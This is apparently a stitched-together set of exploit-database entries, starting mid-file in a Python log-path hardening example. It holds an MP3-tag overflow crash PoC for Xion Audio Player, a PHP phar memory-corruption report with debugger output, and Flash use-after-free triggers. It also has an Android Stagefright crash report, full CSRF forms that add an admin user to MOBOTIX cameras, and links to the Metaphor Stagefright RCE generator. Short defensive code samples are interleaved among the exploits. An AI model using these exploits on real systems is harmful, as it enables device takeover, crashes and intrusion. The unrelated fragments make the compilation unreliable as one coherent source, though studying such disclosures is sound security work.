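    return posixpath.normpath(
        posixpath.join(logs, expand_pattern(pattern, servname, channame, netname)))


def open_log_path(confdir, pattern, servname, channame, netname):
    """What a hardened caller should do: sanitize, then still refuse anything
    that resolves outside the logs directory (the pattern itself is user
    config and may contain '..')."""
    logs = posixpath.join(confdir, LOG_SUBDIR)
    path = build_log_path(confdir, pattern, servname, channame, netname, fixed=True)
    if not is_inside(logs, path):
        raise ValueError("log path escapes %s: %s" % (logs, path))
    return path


if __name__ == "__main__":
    conf = "/home/bob/.config/hexchat"            # constructed
    for fixed in (False, True):
        p = build_log_path(conf, "%s/%c.log", "../PIZZA", "#chan", "net", fixed=fixed)
        print("fixed=%s -> %s (inside logs: %s)" % (fixed, p, is_inside(conf + "/logs", p)))
```

The two layers are deliberate: sanitizing each variable stops the server from naming a component, and the containment check in `open_log_path` catches anything a future pattern variable or an odd user pattern lets through, which matters because the reachable targets the description lists (addons, scrollback, sounds) all sit next to logs under the same configuration directory.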
            
# Exploit Title: Xion Audio Player <= 1.5 (build 160) - Crash PoC
# Date: 01-04-2016
# Software Link: http://www.r2.com.au/downloads/files/xion-audio-player-v1.5b160.zip
# Homepage: http://www.xionplayer.com/
# Exploit Author: Charley Celice (stmerry)
# Contact: https://twitter.com/charleycelice
#
# Category: Crash PoC
# Tested on: Windows XP SP3 English
# Details: Overflowing title/artist tags on an *.mp3 seems to crash the software.
# (works on both standalone/portable versions)

use MP3::Tag;

$mp3 = MP3::Tag->new('legit.mp3'); # whatever mp3 you got handy

$mp3->title_set('A' x 5000); # title/artist tags
$mp3->artist_set('A' x 5000); # may vary although both seems to be needed

$mp3->update_tags();  
$mp3->close();

print "[*] Completed.\n";
            
# Exploit Title: Invalid memory write in phar on filename with \0 in name
# Date: 2016-03-19
# Exploit Author: @vah_13
# Vendor Homepage: https://secure.php.net/
# Software Link: https://github.com/php/php-src
# Version: 5.5.33
# Tested on: Linux



Test script:
---------------
cat test.php
-------------------
<?php
$testfile = file_get_contents($argv[1]);
try {
    $phar = new Phar($testfile);
    $phar['index.php'] = '<?php echo "https://twitter.com/vah_13 ?>';
    $phar['index.phps'] = '<?php echo "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"; ?>';
    $phar->setStub('<?php
Phar::webPhar();
__HALT_COMPILER(); ?>');
} catch (Exception $e) {
        print $e;
}?>
----------------------------------------------------------------------------------

PoC 1

root@TZDG001:/tmp/data2# base64 ret/crash13

(gdb) r  test.php ret/crash13
Starting program: /tmp/php-7.0.4/sapi/cli/php test.php ret/crash13
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
zend_string_init (persistent=0, len=2, str=0x121a64c "->") at
/tmp/php-7.0.4/Zend/zend_string.h:157
157    zend_string *ret = zend_string_alloc(len, persistent);
(gdb) i r
rax            0xae6572  11429234
rbx            0x7fffffffa880  140737488332928
rcx            0x64c  1612
rdx            0x2  2
rsi            0x3  3
rdi            0xae658a  11429258
rbp            0x2  0x2
rsp            0x7fffffffa7e0  0x7fffffffa7e0
r8             0xfffffffffffffffb  -5
r9             0x1  1
r10            0x3  3
r11            0x1214fc0  18960320
r12            0x1206b7a  18901882
r13            0x4  4
r14            0x121a64c  18982476
r15            0x7fffffffa880  140737488332928
rip            0xd531b4  0xd531b4 <add_assoc_string_ex+116>
eflags         0x10206  [ PF IF RF ]
cs             0x33  51
ss             0x2b  43
ds             0x0  0
es             0x0  0
fs             0x0  0
gs             0x0  0

*****************************************************************

PoC 2

root@dns:~/php-src# base64 ./bck_out/6648

./bck_out/6648

==4103== Source and destination overlap in memcpy(0x6e5d800, 0x6e5d798, 291)
==4103==    at 0x4C2D75D: memcpy@@GLIBC_2.14 (vg_replace_strmem.c:915)
==4103==    by 0x6AD1B5: _estrdup (zend_alloc.c:2558)
==4103==    by 0x6880FD: php_stream_display_wrapper_errors (streams.c:152)
==4103==    by 0x68AE4B: _php_stream_opendir (streams.c:1994)
==4103==    by 0x5E986A: spl_filesystem_dir_open (spl_directory.c:236)
==4103==    by 0x5ED77F: spl_filesystem_object_construct (spl_directory.c:724)
==4103==    by 0x6C1655: zend_call_function (zend_execute_API.c:878)
==4103==    by 0x6EBF92: zend_call_method (zend_interfaces.c:103)
==4103==    by 0x5A44A8: zim_Phar___construct (phar_object.c:1219)
==4103==    by 0x75D143: ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (zend_vm_execute.h:1027)
==4103==    by 0x70CFBA: execute_ex (zend_vm_execute.h:423)
==4103==    by 0x76D496: zend_execute (zend_vm_execute.h:467)
==4103==
==4103== Invalid read of size 8
==4103==    at 0x6ACEC3: zend_mm_alloc_small (zend_alloc.c:1291)
==4103==    by 0x6ACEC3: zend_mm_alloc_heap (zend_alloc.c:1362)
==4103==    by 0x6ACEC3: _emalloc (zend_alloc.c:2446)
==4103==    by 0x6DC4E0: zend_hash_real_init_ex (zend_hash.c:140)
==4103==    by 0x6DC4E0: zend_hash_check_init (zend_hash.c:163)
==4103==    by 0x6DC4E0: _zend_hash_add_or_update_i (zend_hash.c:563)
==4103==    by 0x6DC4E0: _zend_hash_str_update (zend_hash.c:667)
==4103==    by 0x6D21FE: zend_symtable_str_update (zend_hash.h:407)
==4103==    by 0x6D21FE: add_assoc_str_ex (zend_API.c:1384)
==4103==    by 0x6E8AA6: zend_fetch_debug_backtrace (zend_builtin_functions.c:2670)
==4103==    by 0x6EDB3A: zend_default_exception_new_ex (zend_exceptions.c:213)
==4103==    by 0x6D1DBA: _object_and_properties_init (zend_API.c:1311)
==4103==    by 0x429178: zend_throw_exception (zend_exceptions.c:877)
==4103==    by 0x4292A5: zend_throw_error_exception (zend_exceptions.c:910)
==4103==    by 0x42639C: php_error_cb (main.c:1041)
==4103==    by 0x427F4B: zend_error (zend.c:1163)
==4103==    by 0x426FFD: php_verror (main.c:897)
==4103==    by 0x427306: php_error_docref1 (main.c:921)
==4103==  Address 0x5c5c5c5c5c5c5c5c is not stack'd, malloc'd or
(recently) free'd
==4103==
==4103==
==4103== Process terminating with default action of signal 11 (SIGSEGV)
==4103==  General Protection Fault
==4103==    at 0x6ACEC3: zend_mm_alloc_small (zend_alloc.c:1291)
==4103==    by 0x6ACEC3: zend_mm_alloc_heap (zend_alloc.c:1362)
==4103==    by 0x6ACEC3: _emalloc (zend_alloc.c:2446)
==4103==    by 0x6DC4E0: zend_hash_real_init_ex (zend_hash.c:140)
==4103==    by 0x6DC4E0: zend_hash_check_init (zend_hash.c:163)
==4103==    by 0x6DC4E0: _zend_hash_add_or_update_i (zend_hash.c:563)
==4103==    by 0x6DC4E0: _zend_hash_str_update (zend_hash.c:667)
==4103==    by 0x6D21FE: zend_symtable_str_update (zend_hash.h:407)
==4103==    by 0x6D21FE: add_assoc_str_ex (zend_API.c:1384)
==4103==    by 0x6E8AA6: zend_fetch_debug_backtrace (zend_builtin_functions.c:2670)
==4103==    by 0x6EDB3A: zend_default_exception_new_ex (zend_exceptions.c:213)
==4103==    by 0x6D1DBA: _object_and_properties_init (zend_API.c:1311)
==4103==    by 0x429178: zend_throw_exception (zend_exceptions.c:877)
==4103==    by 0x4292A5: zend_throw_error_exception (zend_exceptions.c:910)
==4103==    by 0x42639C: php_error_cb (main.c:1041)
==4103==    by 0x427F4B: zend_error (zend.c:1163)
==4103==    by 0x426FFD: php_verror (main.c:897)
==4103==    by 0x427306: php_error_docref1 (main.c:921)
Segmentation fault

Program received signal SIGSEGV, Segmentation fault.
zend_mm_alloc_small (size=<optimized out>, bin_num=16, heap=0x7ffff6000040) at
/root/php_bck/Zend/zend_alloc.c:1291
1291    heap->free_slot[bin_num] = p->next_free_slot;
(gdb) i r
rax            0x5c5c5c5c5c5c5c5c  6655295901103053916
rbx            0x8  8
rcx            0x10  16
rdx            0x7ffff60000c0  140737320583360
rsi            0x10  16
rdi            0x120  288
rbp            0x7ffff6000040  0x7ffff6000040
rsp            0x7fffffffa230  0x7fffffffa230
r8             0xf74460  16204896
r9             0x7ffff6013170  140737320661360
r10            0x0  0
r11            0x101  257
r12            0x7ffff605c658  140737320961624
r13            0x7ffff605c640  140737320961600
r14            0x7ffff60561f8  140737320935928
r15            0x8439b8  8665528
rip            0x6acec3  0x6acec3 <_emalloc+115>
eflags         0x10206  [ PF IF RF ]
cs             0x33  51
ss             0x2b  43
ds             0x0  0
es             0x0  0
fs             0x0  0
gs             0x0  0


https://bugs.php.net/bug.php?id=71860

https://twitter.com/vah_13

https://twitter.com/ret5et
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=451

If Color.setTransform is set to a transform that deletes the field it is called on, a UaF occurs. A PoC is as follows:

var tf:TextField = this.createTextField("tf",1,1,1,4,4)

var n = new Object();

n.valueOf = function () {
	trace("here");
	tf.removeTextField()
}

var o = {ra: n, rb:8};

var c = new Color(tf)
c.setTransform(o)


A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39652.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=523

The attached file causes a crash in ih264d_process_intra_mb in avc parsing, likely due to incorrect bounds checking in one of the memcpy or memset calls in the method.

The file crashes with the following stack trace in M:

09-08 15:51:01.212  8488  8951 F libc    : Fatal signal 11 (SIGSEGV), code 1, fault addr 0x0 in tid 8951 (le.h264.decoder)
09-08 15:51:01.313   198   198 F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
09-08 15:51:01.313   198   198 F DEBUG   : Build fingerprint: 'google/hammerhead/hammerhead:6.0/MRA58G/2228996:userdebug/dev-keys'
09-08 15:51:01.313   198   198 F DEBUG   : Revision: '0'
09-08 15:51:01.313   198   198 F DEBUG   : ABI: 'arm'
09-08 15:51:01.313   198   198 F DEBUG   : pid: 8488, tid: 8951, name: le.h264.decoder  >>> /system/bin/mediaserver <<<
09-08 15:51:01.313   198   198 F DEBUG   : signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0
09-08 15:51:01.317   796   938 W NativeCrashListener: Couldn't find ProcessRecord for pid 8488
09-08 15:51:01.322   198   198 F DEBUG   :     r0 ad7877e0  r1 b21cabf8  r2 00000001  r3 00000220
09-08 15:51:01.322   198   198 E DEBUG   : AM write failed: Broken pipe
09-08 15:51:01.322   198   198 F DEBUG   :     r4 000000c5  r5 0000000a  r6 00000000  r7 00000005
09-08 15:51:01.322   198   198 F DEBUG   :     r8 b3098400  r9 b21cabf8  sl 00000001  fp 00000220
09-08 15:51:01.322   198   198 F DEBUG   :     ip b3099bbc  sp ad7876a0  lr b1c38ab7  pc 00000000  cpsr 200d0010
09-08 15:51:01.329   198   198 F DEBUG   : 
09-08 15:51:01.329   198   198 F DEBUG   : backtrace:
09-08 15:51:01.329   198   198 F DEBUG   :     #00 pc 00000000  <unknown>
09-08 15:51:01.329   198   198 F DEBUG   :     #01 pc 00018ab5  /system/lib/libstagefright_soft_avcdec.so (ih264d_process_intra_mb+2544)
09-08 15:51:01.329   198   198 F DEBUG   :     #02 pc 0000de03  /system/lib/libstagefright_soft_avcdec.so (ih264d_recon_deblk_slice+610)
09-08 15:51:01.329   198   198 F DEBUG   :     #03 pc 0000e0b9  /system/lib/libstagefright_soft_avcdec.so (ih264d_recon_deblk_thread+64)
09-08 15:51:01.329   198   198 F DEBUG   :     #04 pc 0003f3e7  /system/lib/libc.so (__pthread_start(void*)+30)
09-08 15:51:01.329   198   198 F DEBUG   :     #05 pc 00019b43  /system/lib/libc.so (__start_thread+6)
09-08 15:51:01.627   198   198 F DEBUG   : 
09-08 15:51:01.627   198   198 F DEBUG   : Tombstone written to: /data/tombstones/tombstone_02

It crashes with the following trace in L:

W/NativeCrashListener( 2256): Couldn't find ProcessRecord for pid 26174
I/DEBUG   ( 6837): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
E/DEBUG   ( 6837): AM write failure (32 / Broken pipe)
I/DEBUG   ( 6837): Build fingerprint: 'google/shamu/shamu:5.1.1/LYZ28K/2168912:user/release-keys'
I/DEBUG   ( 6837): Revision: '33696'
I/DEBUG   ( 6837): ABI: 'arm'
I/DEBUG   ( 6837): pid: 26174, tid: 7029, name: le.h264.decoder  >>> /system/bin/mediaserver <<<
I/DEBUG   ( 6837): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0
I/DEBUG   ( 6837):     r0 0000000f  r1 ffffffff  r2 af2e286c  r3 00000007
I/DEBUG   ( 6837):     r4 af2e286c  r5 00000010  r6 00000000  r7 00000000
I/DEBUG   ( 6837):     r8 0d452c00  r9 af2fc9c8  sl a36c81f7  fp 1e1a8a58
I/DEBUG   ( 6837):     ip ffffffff  sp af2e2840  lr 0000000f  pc af2ea8f0  cpsr 800c0010
I/DEBUG   ( 6837): 
I/DEBUG   ( 6837): backtrace:
I/DEBUG   ( 6837):     #00 pc 000078f0  /system/lib/libstagefright_soft_h264dec.so
I/DEBUG   ( 6837):     #01 pc 0000000d  <unknown>
I/DEBUG   ( 6837): 
I/DEBUG   ( 6837): Tombstone written to: /data/tombstones/tombstone_09

To reproduce the issue, download the attached file, and wait for it to be thumbnailed. This can be triggered by opening the downloads folder in the Photos application.

Reported to Android here: https://code.google.com/p/android/issues/detail?id=185644


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39651.zip
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=581

There is a use-after-free in the TextField.maxChars setter. If the maxChars the field is set to is an object with valueOf defined, the valueOf function can free the field's parent object, which is then used. A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.maxChars = {valueOf : func};

function func(){

        if (times == 0){
            times++;
            return 7;
        }
	mc.removeMovieClip();

        // Fix heap here

	return 7;
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39650.zip
            
<!--


MOBOTIX Video Security Cameras CSRF Add Admin Exploit


Vendor: MOBOTIX AG
Product web page: https://www.mobotix.com
Affected version: [Model]: D22M-Secure, [HW]: T2r1.1.AA, 520 MHz, 128 MByte RAM, [SW]: MX-V3.5.2.23.r3
                  [Model]: Q24M-Secure, [HW]: T2r3.1, 806 MHz, [SW]: MX-V4.1.10.28
                  [Model]: D14D-Secure, [HW]: T2r4.2b, 806 MHz, 256 MByte RAM, [SW]: MX-V4.1.4.70
                  [Model]: M15D-Secure, [HW]: T3r4.4, 806 MHz, [SW]: MX-V4.3.4.50

Summary: MOBOTIX is a German System Manufacturer of Professional Video
Management (VMS) and Smart IP Cameras. These cameras support all standard
features of MOBOTIX IP cameras like automatic object detection, messaging
via network and onboard or network recording. The dual lens thermal system
supports additionally a second optical video sensor with 6-megapixel resolution.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.

Tested on: Linux 2.6.37.6+
           thttpd/2.19-MX


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5312
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5312.php


25.02.2016

-->



Add admin user Testingus:
-------------------------

<html>
  <body>
    <form action="http://10.0.0.17/admin/access" method="POST">
      <input type="hidden" name="user&#95;name&#95;0" value="admin" />
      <input type="hidden" name="user&#95;group&#95;0" value="admins" />
      <input type="hidden" name="user&#95;passwd&#95;a&#95;0" value="&#42;&#42;&#42;" />
      <input type="hidden" name="user&#95;passwd&#95;b&#95;0" value="&#42;&#42;&#42;" />
      <input type="hidden" name="user&#95;name&#95;2" value="Testingus" />
      <input type="hidden" name="user&#95;group&#95;1" value="admins" />
      <input type="hidden" name="user&#95;passwd&#95;a&#95;2" value="l33tp4ss" />
      <input type="hidden" name="user&#95;passwd&#95;b&#95;2" value="l33tp4ss" />
      <input type="hidden" name="sv&#95;passwd&#95;a" value="" />
      <input type="hidden" name="sv&#95;passwd&#95;b" value="" />
      <input type="hidden" name="super&#95;pin&#95;1" value="" />
      <input type="hidden" name="super&#95;pin&#95;2" value="" />
      <input type="hidden" name="save&#95;config" value="Set" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>


Add group 'users' to admin area:
--------------------------------

<html>
  <body>
    <form action="http://10.0.0.17/admin/acl" method="POST">
      <input type="hidden" name="group&#95;allow&#95;guest&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;live&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;player&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;multiview&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;pda&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;mxcc&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;info&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;imagelink&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;api&#95;global" value="on" />
      <input type="hidden" name="group&#95;allow&#95;image&#95;setup&#95;0" value="on" />
      <input type="hidden" name="group&#95;allow&#95;event&#95;setup&#95;0" value="on" />
      <input type="hidden" name="group&#95;name&#95;1" value="guests" />
      <input type="hidden" name="group&#95;name&#95;2" value="users" />
      <input type="hidden" name="group&#95;allow&#95;admin&#95;2" value="on" />
      <input type="hidden" name="group&#95;allow&#95;image&#95;setup&#95;2" value="on" />
      <input type="hidden" name="group&#95;allow&#95;event&#95;setup&#95;2" value="on" />
      <input type="hidden" name="new&#95;group" value="" />
      <input type="hidden" name="save&#95;config" value="Set" />
      <input type="hidden" name="more&#95;or&#95;less" value="less" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>
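The two forms above succeed because the camera's /admin handlers act on any POST that carries the victim's browser session, with nothing tying the request to the camera's own UI. As an added example (not from the advisory and not MOBOTIX firmware code), the following Python shows the two server-side checks a handler such as /admin/access or /admin/acl would need to refuse such a request: validation of the Origin (or Referer) header against the site's own origin, and a per-session anti-CSRF token compared in constant time. ALLOWED_ORIGINS, the function names and the sample requests are constructed assumptions; the sample form fields only mirror the entity-encoded names used in the PoC.

```python
"""Server-side CSRF defence for a state-changing admin endpoint.

Added example (not MOBOTIX code). Names, the allowed origin and the sample
requests are constructed for illustration.
"""
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import urlsplit

# Assumption: the camera's own web UI is served from this origin (the
# address the PoC forms post to).
ALLOWED_ORIGINS = {"http://10.0.0.17"}


def new_csrf_token() -> str:
    """Issue an unguessable per-session token. The server keeps it in the
    session and embeds it as a hidden field in every legitimate admin form."""
    return secrets.token_urlsafe(32)


def request_origin(headers: Dict[str, str]) -> Optional[str]:
    """Derive scheme://host[:port] from Origin, or from Referer when Origin
    is absent. Returns None when neither header is usable."""
    origin = headers.get("Origin")
    if origin:
        return origin.rstrip("/")
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        if parts.scheme and parts.netloc:
            return f"{parts.scheme}://{parts.netloc}"
    return None


def csrf_check(headers: Dict[str, str], form: Dict[str, str],
               session_token: Optional[str]) -> Tuple[bool, str]:
    """Decide whether a configuration-changing POST may proceed.

    Both checks are applied: Origin/Referer can be missing (privacy settings,
    older clients), and the token check does not depend on headers at all.
    Returns (allowed, reason) so that refusals can be logged.
    """
    origin = request_origin(headers)
    if origin is None:
        return False, "missing Origin and Referer"
    if origin not in ALLOWED_ORIGINS:
        return False, "cross-site origin " + origin
    if not session_token:
        return False, "no CSRF token bound to this session"
    submitted = form.get("csrf_token", "")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(submitted.encode(), session_token.encode()):
        return False, "CSRF token mismatch"
    return True, "ok"


# Constructed sample request: the shape of the hidden-form POST above,
# as a browser would send it from a third-party page.
CROSS_SITE_POST = {
    "headers": {"Origin": "http://attacker.example",
                "Referer": "http://attacker.example/page.html"},
    "form": {"user_name_2": "Testingus", "user_group_1": "admins",
             "save_config": "Set"},
}


def legitimate_post(token: str) -> Dict[str, Dict[str, str]]:
    """Constructed sample: the same change submitted from the camera's own
    admin page, which carries the session's token."""
    return {
        "headers": {"Origin": "http://10.0.0.17",
                    "Referer": "http://10.0.0.17/admin/access"},
        "form": {"user_name_2": "Testingus", "user_group_1": "admins",
                 "save_config": "Set", "csrf_token": token},
    }


if __name__ == "__main__":
    token = new_csrf_token()
    for label, req in (("cross-site", CROSS_SITE_POST),
                       ("same-origin", legitimate_post(token))):
        allowed, reason = csrf_check(req["headers"], req["form"], token)
        print(f"{label:12s} -> {'ALLOW' if allowed else 'DENY'} ({reason})")
```

Run as a script it reports DENY for the cross-site request and ALLOW for the same-origin one. The refusal reason is returned rather than only printed so that a real handler can write it to the camera's log, which is also where a defender would look for repeated cross-site POSTs against /admin.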
            
Source: https://github.com/NorthBit/Metaphor

Metaphor - Stagefright with ASLR bypass By Hanan Be'er from NorthBit Ltd.

Link to whitepaper: https://raw.githubusercontent.com/NorthBit/Public/master/NorthBit-Metaphor.pdf

Twitter: https://twitter.com/High_Byte

Metaphor's source code is now released! The source includes a PoC that generates MP4 exploits in real time and bypasses ASLR. The PoC includes lookup tables for Nexus 5 Build LRX22C with Android 5.0.1. The server side of the PoC includes simple PHP scripts that run the exploit generator - I'm using XAMPP to serve gzipped MP4 files. The attack page is index.php.

The exploit generator is written in Python and is used by the PHP code.

usage: metaphor.py [-h] [-c CONFIG] -o OUTPUT {leak,rce,suicide} ...

positional arguments:
  {leak,rce,suicide}    Type of exploit to generate

optional arguments:
  -h, --help            show this help message and exit
  -c CONFIG, --config CONFIG
                        Override exploit configuration
  -o OUTPUT, --output OUTPUT

Credits: To the NorthBit team E.P. - My shining paladin, for assisting in boosting this project to achieve all the goals.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39640.zip